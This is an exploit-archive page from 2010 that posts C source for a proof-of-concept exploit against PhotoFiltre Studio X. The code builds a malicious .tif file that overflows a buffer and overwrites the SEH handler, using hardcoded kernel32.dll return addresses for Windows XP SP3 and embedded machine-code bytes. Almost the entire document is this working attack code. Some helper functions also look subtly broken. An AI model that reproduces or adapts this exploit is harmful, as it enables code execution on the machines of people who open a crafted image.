PhotoFiltre Studio X .tif file local buffer overflow
Posted on 04 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PhotoFiltre Studio X .tif file local buffer overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== PhotoFiltre Studio X .tif file local buffer overflow ==================================================== #include<stdio.h> #define fisier FILE #define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) #define VER "10.3.0" #define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)" #define AUTHOR "[*]fl0 fl0w" typedef char i8; typedef short i16; typedef int i32; void gen_random(i8*,const int); void print(i8*); i32 mcpy(void*,const void*,i32); void fwi32(fisier*,i32); i32 filerr(fisier*); void error(void); void filebuild(); unsigned int getFsize(fisier*,i8*); i32 sizes[]={257,163,217,213,940,29}; typedef struct { /*Retcodes from MS Windows xp pro sp3 */ i32 popopret; i32 jmpbyte; i32 jmpEBP; }instr; i32 main() {filebuild(); printf("%s %s ",POCNAME,AUTHOR); print("file done"); getchar(); } void filebuild() { /*The logic: overwrite seh handler with pop pop ret,overwrite next seh with jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr. Because there isn't space for shellcode I chose this jmp ebp option. And a egghunter wouldn't be the solution because u also need space for it. */ i8 tif1[]= { 0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01, 0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02, 0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89, 0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0, 0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3, }; i8 tif2[]= { 0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00, 0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00, 0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00, 0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00, 0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00, 0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00, 0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00, 0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00, 0xC4, 0x00, 0x33, }; /* tif1sz=v[1] tif2sz[]=v[2] sehoffset=v[3] nsehoffset=v[4] junksz=v[5] jmpebpoffset=v[6] */ fisier* in=fopen("exploit.in","r"), * out=fopen("exploit.tif","wb"); //i8 buf=ALOC(i8,100001); i8 buf[100001]; instr* ASM; ASM=ALOC(instr,sizeof(instr)); ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr) ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll memcpy(tif1+217,&ASM->popopret,4); memcpy(tif1+213,&ASM->jmpEBP,4); memcpy(tif1+29,&ASM->jmpbyte,4); if(out){ fwrite(tif1,sizeof(i8),sizeof(tif1),out); gen_random(&buf,940); fwrite(&buf,sizeof(i8),940,out); fwrite(tif2,sizeof(i8),sizeof(tif2),out); fclose(out); free(buf); } else { error(); } } void error(void) { perror(" Error:"); } i32 filerr(fisier* F) { return (ferror(F)); } void readf(void) { } void fwi32(fisier* F,i32 adr) { fputc(adr&0xff,F); fputc((adr>>8)&0xff,F); fputc((adr>>16)&0xff,F); fputc((adr>>24)&0xff,F); } i32 mcpy(void* dest,const void* source,i32 len) { void* D=dest; const void* S=source; len=sizeof(source); memcpy(D,S,len); return (len); } void print(i8* msg) { printf("[*]%s ",msg); } void gen_random(i8* s,const int len) { i32 i; static const i8 alphanum[]= { "0123456789ABCDEFGHIJKLMNOPQRST" "UVWXYZabcdefghijklmnopqrstuvwxyz"}; for(i=1;i<len;++i) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
